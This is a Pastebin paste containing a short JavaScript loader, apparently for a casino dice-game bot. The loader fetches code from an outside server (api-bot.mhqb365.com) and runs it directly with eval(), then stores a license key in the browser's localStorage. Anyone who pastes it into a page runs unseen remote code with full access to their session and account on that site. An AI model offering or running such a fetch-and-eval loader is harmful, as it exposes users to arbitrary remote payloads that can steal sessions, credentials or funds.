Advertisement
Ypleitez

Untitled

Jan 29th, 2024
76
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.34 KB | None | 0 0
  1. const WDB_API = 'https://api-bot.mhqb365.com';
  2. const CASINO_GAME = 'wolf-dice';
  3. (async function () {
  4. let installer = await fetch(WDB_API + '/stable/init')
  5. installer = await installer.text()
  6. eval(installer)
  7. })();
  8. localStorage.setItem('license', '4fd6b586-448b-4985-ac7a-179b7e8852ff')
  9.  
  10.  
  11.  
  12.  
  13.  
  14.  
  15.  
  16.  
  17.  
  18. 36ff6eac-d678-4ca2-976f-aa8dac97b966
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement